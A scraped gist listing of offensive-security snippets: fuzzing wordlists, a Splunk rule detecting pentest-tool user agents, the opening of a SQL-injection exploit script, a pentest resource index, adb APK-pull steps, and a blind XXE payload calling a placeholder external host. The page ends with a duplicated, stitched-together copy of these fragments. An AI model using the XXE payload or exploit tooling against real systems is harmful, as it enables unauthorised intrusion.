afwu

## bug-bounty-wordlist.txt
cgi-bin
images
admin
includes
modules
templates
cache
media
js
language

## splunk_suspicious_user_agent.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                afwu
                / splunk_suspicious_user_agent.md
            
            
              Created
              July 23, 2021 08:20
                — forked from darkquasar/splunk_suspicious_user_agent.md
            
              
                Splunk Search to Weed Out Low Hanging Fruit and Out-Of-The-Box Pentest
              
          
    Draft rule for a Splunk Search

Suspicious User Agents

You will not detect APTs with this but you will weed out low hanging fruit and not too savvy pentesters :)
user_agent IN ("burp" "burpcollaborator.net" "qualys" "nexpose" "OpenVAS" "Nikto" "Meterpreter" "IceWeasel" "DirB" "Comodo" "Tripwire" "Retina" "MBSA" "ImmuniWeb" "Netsparker" "Acunetix" "Intruder" "WinHttp.WinHttpRequest" "nmap" "CVE" "base64" "eval" "ftp" "/script" "javascript" "alert" ) NOT (user_agent="google")
| eval detection_description=if(like(user_agent,"%WinHttpRequest%"),"CScript or VBScript Call",detection_description)
| eval detection_description=if(like(user_agent,"%Iceweasel%"),"Potentially Kali",detection_description)
| eval detection_description=if(like(user_agent,"%Meterpreter%"),"Meterpreter",detection_description)

  
## sqli_exp_binary_search_string.py
#!/usr/bin/env python3
import requests

client = requests.Session()
debug = False

def post(url, data, headers=None, proxy=False):
    if not headers:
        headers = {}
    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'

## 1-1000.txt
the
of
to
and
a
in
is
it
you
that

## file.txt
-api
eyj
-api-key
-auth
-authorization
-back
-client
-config
-custom
-id

## content_discovery_all.txt
`
~/
~
×™×


___
__
_

## offsec.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                afwu
                / offsec.md
            
            
              Created
              March 24, 2021 01:16
                — forked from jivoi/offsec.md
            
              
                Penetrating Testing/Assessment Workflow
              
          
    Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

Reconnaissance

Passive/Semi-Passive

Tools


Discover - https://github.com/leebaird/discover


## android-adb-pull-apk.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                afwu
                / android-adb-pull-apk.md
            
            
              Created
              February 26, 2021 09:14
                — forked from ctrl-freak/android-adb-pull-apk.md
            
              
                Retrieve APK from Non-Rooted Android Device through ADB
              
          
    https://stackoverflow.com/a/18003462/348146

None of these suggestions worked for me, because Android was appending a sequence number to the package name to produce the final APK file name (this may vary with the version of Android OS). The following sequence of commands is what worked for me on a non-rooted device:


Determine the package name of the app, e.g. com.example.someapp. Skip this step if you already know the package name.
adb shell pm list packages
Look through the list of package names and try to find a match between the app in question and the package name. This is usually easy, but note that the package name can be completely unrelated to the app name. If you can't recognize the app from the list of package names, try finding the app in Google Play using a browser. The URL for an app in Google Play contains the package name.


## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## tw5-server.rb
require 'webrick'
require 'fileutils'

if ARGV.length != 0
   root = ARGV.first.gsub('\\', '/')
else
   root = '.'
end
BACKUP_DIR = 'bak'
	cgi-bin
	images
	admin
	includes
	modules
	templates
	cache
	media
	js
	language
	#!/usr/bin/env python3
	import requests

	client = requests.Session()
	debug = False

	def post(url, data, headers=None, proxy=False):
	if not headers:
	headers = {}
	headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'
	-api
	eyj
	-api-key
	-auth
	-authorization
	-back
	-client
	-config
	-custom
	-id
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	require 'webrick'
	require 'fileutils'

	if ARGV.length != 0
	root = ARGV.first.gsub('\\', '/')
	else
	root = '.'
	end
	BACKUP_DIR = 'bak'